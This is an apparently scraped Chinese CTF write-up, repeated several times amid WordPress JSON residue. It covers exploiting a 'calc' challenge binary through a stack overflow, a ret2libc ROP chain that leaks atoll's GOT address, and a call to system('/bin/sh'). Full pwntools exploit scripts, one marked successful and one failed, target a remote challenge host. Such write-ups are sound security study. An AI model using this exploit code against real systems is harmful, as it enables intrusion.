![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311132-QQ_1760311127566.png\")
<\/figure>\n\n\n\n\u89e3\u9898\u601d\u8def<\/h2>\n\n\n\n![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311203-QQ_1760311161467.png\")
<\/figure>\n\n\n\nedit\u51fd\u6570\u4e2d\u5f53v3\u4e3a0\u65f6\u53ef\u4ee5\u63a7\u5236\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311239-QQ_1760311236169.png\")
<\/figure>\n\n\n\n\u540c\u65f6\u4e3b\u51fd\u6570\u4e2ds\u5728\u6808\u4e0a\u5185\u5b58\u4e0eedit\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u76f8\u90bb\uff0c\u6545\u53ef\u4ee5\u5f53\u6210\u6808\u6ea2\u51fa\u6784\u9020ROP\u94fe\u6765\u6253<\/p>\n\n\n\n
\u5b9e\u9645\u7ecf\u5386<\/h2>\n\n\n\n\u6210\u529fexp<\/h3>\n\n\n\nfrom pwn import *\n\ncontext(arch='amd64',log_level='debug')\nfile = '.\/calc'\nelf = ELF(file)\nlibc = ELF(\".\/libc.so.6\")\n\ns = lambda data :p.send(data)\nsa = lambda text,data :p.sendafter(text, data)\nsl = lambda data :p.sendline(data)\nsla = lambda text,data :p.sendlineafter(text, data)\nr = lambda num=4096 :p.recv(num)\nrl = lambda :p.recvline()\nru = lambda text :p.recvuntil(text)\nuu32 = lambda :u32(p.recvuntil(b\"\\xf7\")[-4:].ljust(4,b\"\\x00\"))\nuu64 = lambda :u64(p.recvuntil(b\"\\x7f\")[-6:].ljust(8,b\"\\x00\"))\ninf = lambda s :info(f\"{s} ==> 0x{eval(s):x}\")\n\ndef show():\n ru(\"5. Exit\")\n sl(\"1\")\ndef edit(number,data):\n ru(\"5. Exit\")\n sl(\"2\")\n ru(\"Which number?\")\n sl(str(number))\n ru(\"Change to what?\")\n sl(str(data))\n\np=remote(\"8.147.132.32\",16726)\n# p=process(file)\n# gdb.attach(p,\"b *0x40116A\")\n\n\natoll_got = elf.got['atoll']\npop_rdi=0x401253\npop_rsi_r15=0x401251\n\nedit(1,atoll_got)\nedit(2,0x400857)\nedit(3,0x4006b6)\nedit(4,0x40116A)\nedit(0,pop_rdi)\n\nru(\"> \")\natoll_addr=u64(p.recv(6).ljust(8,b\"\\x00\"))\nprint(\"write_addr\",atoll_addr)\nlibcbase = atoll_addr - libc.symbols['atoll']\nsystem_addr = libcbase + libc.symbols['system']\nbinsh_addr = libcbase + next(libc.search(b'\/bin\/sh'))\n\nret=0x4006b6\nru(\"> \")\nsl(\"8\")\nru(\"Change to what?\")\nsl(str(binsh_addr))\nedit(6,binsh_addr)\nedit(7,system_addr)\nedit(5,pop_rdi)\nedit(4,ret)\np.interactive()<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311485-QQ_1760311477636.png\")
<\/figure>\n\n\n\n\u6574\u4f53\u601d\u8def\u8ddfret2libc\u5dee\u4e0d\u591a\uff0c\u4f46\u662f\u53ea\u6709rdi\u4e0ersi\u53ef\u4ee5\u8f7b\u677e\u7684\u63a7\u5236\uff0crdx\u6bd4\u8f83\u96be\u63a7\u5236\uff0c\u4e8e\u662f\u501f\u7528\u7a0b\u5e8f\u672c\u8eab\u7684beta_puts\u51fd\u6570\u6765\u6253\u5370got\u5730\u5740<\/p>\n\n\n\n![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311552-QQ_1760311548978.png\")
<\/figure>\n\n\n\n\u8fd9\u91cc\u6709\u4e00\u4e2a\u95ee\u9898\u662f\u4e3a\u4ec0\u4e48\u8981\u9009\u62e9atoll\u51fd\u6570\u6765\u8ba1\u7b97\u57fa\u5740\u800c\u4e0d\u662f\u5e38\u89c4\u7684write\u51fd\u6570<\/p>\n\n\n\n![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311607-QQ_1760311597753.png\")
<\/figure>\n\n\n\n\u56e0\u4e3awrite\u7684got\u5730\u5740\u4e2d\u6709\\x00\uff0c\u800cbeta_puts\u51fd\u6570\u91cc\u7684strlen\u4f1a\u622a\u65ad<\/p>\n\n\n\n![\"\"](\"http:\/\/www.xuanbin.top\/wp-content\/uploads\/2025\/10\/1760311674-QQ_1760311671162.png\")
<\/figure>\n\n\n\n\u4e00\u4e2a\u4e00\u4e2a\u8bd5\u4e86\u4e4b\u540e\u53d1\u73b0atoll\u53ef\u4ee5\uff0c\u6545\u7528atoll\u3002<\/p>\n\n\n\n
\u5931\u8d25exp<\/h3>\n\n\n\nfrom pwn import *\n\ncontext(arch='amd64',log_level='debug')\nfile = '.\/calc'\nelf = ELF(file)\nlibc = ELF(\".\/libc.so.6\")\n\ns = lambda data :p.send(data)\nsa = lambda text,data :p.sendafter(text, data)\nsl = lambda data :p.sendline(data)\nsla = lambda text,data :p.sendlineafter(text, data)\nr = lambda num=4096 :p.recv(num)\nrl = lambda :p.recvline()\nru = lambda text :p.recvuntil(text)\nuu32 = lambda :u32(p.recvuntil(b\"\\xf7\")[-4:].ljust(4,b\"\\x00\"))\nuu64 = lambda :u64(p.recvuntil(b\"\\x7f\")[-6:].ljust(8,b\"\\x00\"))\ninf = lambda s :info(f\"{s} ==> 0x{eval(s):x}\")\n\ndef show():\n ru(\"5. Exit\")\n sl(\"1\")\ndef edit(number,data):\n ru(\"5. Exit\")\n sl(\"2\")\n ru(\"Which number?\")\n sl(str(number))\n ru(\"Change to what?\")\n sl(str(data))\n\np=remote(\"8.147.132.32\",16726)\n# p=process(file)\n# gdb.attach(p,\"b *0x40116A\")\n\nedit(1,write_got)\nedit(2,0)\nedit(3,pop_rdi)\nedit(4,1)\nedit(5,0x4006E0)\nedit(6,0x40116A)\nedit(0,0x401251)\nru(\"> \")\natoll_addr=u64(p.recv(6).ljust(8,b\"\\x00\"))\nprint(\"write_addr\",atoll_addr)\nlibcbase = atoll_addr - libc.symbols['atoll']\nsystem_addr = libcbase + libc.symbols['system']\nbinsh_addr = libcbase + next(libc.search(b'\/bin\/sh'))\nret=0x4006b6\nru(\"> \")\nsl(\"8\")\nru(\"Change to what?\")\nsl(str(binsh_addr))\nedit(6,binsh_addr)\nedit(7,system_addr)\nedit(5,pop_rdi)\nedit(4,ret)\np.interactive()<\/code><\/pre>\n\n\n\n\u4e0e\u6210\u529f\u7684exp\u4e0d\u540c\u7684\u5730\u65b9\u5728\u4e8e\u7b2c\u4e00\u6b21\u8fd4\u56de\u7684\u5730\u5740\u9009\u62e9\u4e86\u6700\u5e38\u89c4\u7684\u6253\u6cd5\u7528write\u7684plt\u53bb\u8c03\u7528write\u51fd\u6570\u6253\u5370\u5730\u5740\uff0c\u4e0d\u8fc7rdx\u65e0\u6cd5\u63a7\u5236\uff0c\u5bfb\u601d\u7740\u53cd\u6b63\u51fd\u6570\u6267\u884c\u8fc7\u7a0b\u4e2drdx\u80af\u5b9a\u662f\u67d0\u4e2a\u503c\u7684\uff0c\u53ea\u8981\u5927\u4e8e8\u5e94\u8be5\u90fd\u53ef\u4ee5\u3002\u5728\u672c\u5730\u6253\u7684\u65f6\u5019\u53d1\u73b0\u4e00\u6b21\u6253\u5370\u4e860x800\u4e2a\u5b57\u8282\uff0c\u4f46\u662f\u4e5f\u786e\u5b9e\u80fd\u6cc4\u9732\uff0c\u8fdc\u7a0b\u65f6\u56e0\u4e3a0x800\u4e2a\u5b57\u8282\u592a\u591a\u63a5\u53d7\u4e0d\u5230\u6570\u636e\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u6bd4\u8f83\u7262\u7684\u4e00\u6b21\u7ecf\u5386\uff0c\u6539exp\u6539\u4e86\u4e24\u6b21\u3002 \u6587\u4ef6\u4fdd\u62a4 \u89e3\u9898\u601d\u8def edit\u51fd\u6570\u4e2d\u5f53v3\u4e3a0\u65f6\u53ef\u4ee5\u63a7\u5236\u8fd4\u56de\u5730\u5740 \u540c\u65f6\u4e3b\u51fd\u6570\u4e2ds\u5728\u6808\u4e0a\u5185\u5b58\u4e0ee …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-151","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts\/151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/comments?post=151"}],"version-history":[{"count":2,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts\/151\/revisions"}],"predecessor-version":[{"id":162,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts\/151\/revisions\/162"}],"wp:attachment":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/media?parent=151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/categories?post=151"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/tags?post=151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
<\/figure>\n\n\n\nedit\u51fd\u6570\u4e2d\u5f53v3\u4e3a0\u65f6\u53ef\u4ee5\u63a7\u5236\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n \u540c\u65f6\u4e3b\u51fd\u6570\u4e2ds\u5728\u6808\u4e0a\u5185\u5b58\u4e0eedit\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u76f8\u90bb\uff0c\u6545\u53ef\u4ee5\u5f53\u6210\u6808\u6ea2\u51fa\u6784\u9020ROP\u94fe\u6765\u6253<\/p>\n\n\n\n \u6574\u4f53\u601d\u8def\u8ddfret2libc\u5dee\u4e0d\u591a\uff0c\u4f46\u662f\u53ea\u6709rdi\u4e0ersi\u53ef\u4ee5\u8f7b\u677e\u7684\u63a7\u5236\uff0crdx\u6bd4\u8f83\u96be\u63a7\u5236\uff0c\u4e8e\u662f\u501f\u7528\u7a0b\u5e8f\u672c\u8eab\u7684beta_puts\u51fd\u6570\u6765\u6253\u5370got\u5730\u5740<\/p>\n\n\n\n \u8fd9\u91cc\u6709\u4e00\u4e2a\u95ee\u9898\u662f\u4e3a\u4ec0\u4e48\u8981\u9009\u62e9atoll\u51fd\u6570\u6765\u8ba1\u7b97\u57fa\u5740\u800c\u4e0d\u662f\u5e38\u89c4\u7684write\u51fd\u6570<\/p>\n\n\n\n \u56e0\u4e3awrite\u7684got\u5730\u5740\u4e2d\u6709\\x00\uff0c\u800cbeta_puts\u51fd\u6570\u91cc\u7684strlen\u4f1a\u622a\u65ad<\/p>\n\n\n\n \u4e00\u4e2a\u4e00\u4e2a\u8bd5\u4e86\u4e4b\u540e\u53d1\u73b0atoll\u53ef\u4ee5\uff0c\u6545\u7528atoll\u3002<\/p>\n\n\n\n \u4e0e\u6210\u529f\u7684exp\u4e0d\u540c\u7684\u5730\u65b9\u5728\u4e8e\u7b2c\u4e00\u6b21\u8fd4\u56de\u7684\u5730\u5740\u9009\u62e9\u4e86\u6700\u5e38\u89c4\u7684\u6253\u6cd5\u7528write\u7684plt\u53bb\u8c03\u7528write\u51fd\u6570\u6253\u5370\u5730\u5740\uff0c\u4e0d\u8fc7rdx\u65e0\u6cd5\u63a7\u5236\uff0c\u5bfb\u601d\u7740\u53cd\u6b63\u51fd\u6570\u6267\u884c\u8fc7\u7a0b\u4e2drdx\u80af\u5b9a\u662f\u67d0\u4e2a\u503c\u7684\uff0c\u53ea\u8981\u5927\u4e8e8\u5e94\u8be5\u90fd\u53ef\u4ee5\u3002\u5728\u672c\u5730\u6253\u7684\u65f6\u5019\u53d1\u73b0\u4e00\u6b21\u6253\u5370\u4e860x800\u4e2a\u5b57\u8282\uff0c\u4f46\u662f\u4e5f\u786e\u5b9e\u80fd\u6cc4\u9732\uff0c\u8fdc\u7a0b\u65f6\u56e0\u4e3a0x800\u4e2a\u5b57\u8282\u592a\u591a\u63a5\u53d7\u4e0d\u5230\u6570\u636e\u3002<\/p>\n","protected":false},"excerpt":{"rendered":" \u6bd4\u8f83\u7262\u7684\u4e00\u6b21\u7ecf\u5386\uff0c\u6539exp\u6539\u4e86\u4e24\u6b21\u3002 \u6587\u4ef6\u4fdd\u62a4 \u89e3\u9898\u601d\u8def edit\u51fd\u6570\u4e2d\u5f53v3\u4e3a0\u65f6\u53ef\u4ee5\u63a7\u5236\u8fd4\u56de\u5730\u5740 \u540c\u65f6\u4e3b\u51fd\u6570\u4e2ds\u5728\u6808\u4e0a\u5185\u5b58\u4e0ee …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-151","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts\/151","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/comments?post=151"}],"version-history":[{"count":2,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts\/151\/revisions"}],"predecessor-version":[{"id":162,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/posts\/151\/revisions\/162"}],"wp:attachment":[{"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/media?parent=151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/categories?post=151"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xuanbin.top\/index.php\/wp-json\/wp\/v2\/tags?post=151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<\/figure>\n\n\n\n\u5b9e\u9645\u7ecf\u5386<\/h2>\n\n\n\n
\u6210\u529fexp<\/h3>\n\n\n\n
from pwn import *\n\ncontext(arch='amd64',log_level='debug')\nfile = '.\/calc'\nelf = ELF(file)\nlibc = ELF(\".\/libc.so.6\")\n\ns = lambda data :p.send(data)\nsa = lambda text,data :p.sendafter(text, data)\nsl = lambda data :p.sendline(data)\nsla = lambda text,data :p.sendlineafter(text, data)\nr = lambda num=4096 :p.recv(num)\nrl = lambda :p.recvline()\nru = lambda text :p.recvuntil(text)\nuu32 = lambda :u32(p.recvuntil(b\"\\xf7\")[-4:].ljust(4,b\"\\x00\"))\nuu64 = lambda :u64(p.recvuntil(b\"\\x7f\")[-6:].ljust(8,b\"\\x00\"))\ninf = lambda s :info(f\"{s} ==> 0x{eval(s):x}\")\n\ndef show():\n ru(\"5. Exit\")\n sl(\"1\")\ndef edit(number,data):\n ru(\"5. Exit\")\n sl(\"2\")\n ru(\"Which number?\")\n sl(str(number))\n ru(\"Change to what?\")\n sl(str(data))\n\np=remote(\"8.147.132.32\",16726)\n# p=process(file)\n# gdb.attach(p,\"b *0x40116A\")\n\n\natoll_got = elf.got['atoll']\npop_rdi=0x401253\npop_rsi_r15=0x401251\n\nedit(1,atoll_got)\nedit(2,0x400857)\nedit(3,0x4006b6)\nedit(4,0x40116A)\nedit(0,pop_rdi)\n\nru(\"> \")\natoll_addr=u64(p.recv(6).ljust(8,b\"\\x00\"))\nprint(\"write_addr\",atoll_addr)\nlibcbase = atoll_addr - libc.symbols['atoll']\nsystem_addr = libcbase + libc.symbols['system']\nbinsh_addr = libcbase + next(libc.search(b'\/bin\/sh'))\n\nret=0x4006b6\nru(\"> \")\nsl(\"8\")\nru(\"Change to what?\")\nsl(str(binsh_addr))\nedit(6,binsh_addr)\nedit(7,system_addr)\nedit(5,pop_rdi)\nedit(4,ret)\np.interactive()<\/code><\/pre>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n<\/figure>\n\n\n\n\u5931\u8d25exp<\/h3>\n\n\n\n
from pwn import *\n\ncontext(arch='amd64',log_level='debug')\nfile = '.\/calc'\nelf = ELF(file)\nlibc = ELF(\".\/libc.so.6\")\n\ns = lambda data :p.send(data)\nsa = lambda text,data :p.sendafter(text, data)\nsl = lambda data :p.sendline(data)\nsla = lambda text,data :p.sendlineafter(text, data)\nr = lambda num=4096 :p.recv(num)\nrl = lambda :p.recvline()\nru = lambda text :p.recvuntil(text)\nuu32 = lambda :u32(p.recvuntil(b\"\\xf7\")[-4:].ljust(4,b\"\\x00\"))\nuu64 = lambda :u64(p.recvuntil(b\"\\x7f\")[-6:].ljust(8,b\"\\x00\"))\ninf = lambda s :info(f\"{s} ==> 0x{eval(s):x}\")\n\ndef show():\n ru(\"5. Exit\")\n sl(\"1\")\ndef edit(number,data):\n ru(\"5. Exit\")\n sl(\"2\")\n ru(\"Which number?\")\n sl(str(number))\n ru(\"Change to what?\")\n sl(str(data))\n\np=remote(\"8.147.132.32\",16726)\n# p=process(file)\n# gdb.attach(p,\"b *0x40116A\")\n\nedit(1,write_got)\nedit(2,0)\nedit(3,pop_rdi)\nedit(4,1)\nedit(5,0x4006E0)\nedit(6,0x40116A)\nedit(0,0x401251)\nru(\"> \")\natoll_addr=u64(p.recv(6).ljust(8,b\"\\x00\"))\nprint(\"write_addr\",atoll_addr)\nlibcbase = atoll_addr - libc.symbols['atoll']\nsystem_addr = libcbase + libc.symbols['system']\nbinsh_addr = libcbase + next(libc.search(b'\/bin\/sh'))\nret=0x4006b6\nru(\"> \")\nsl(\"8\")\nru(\"Change to what?\")\nsl(str(binsh_addr))\nedit(6,binsh_addr)\nedit(7,system_addr)\nedit(5,pop_rdi)\nedit(4,ret)\np.interactive()<\/code><\/pre>\n\n\n\n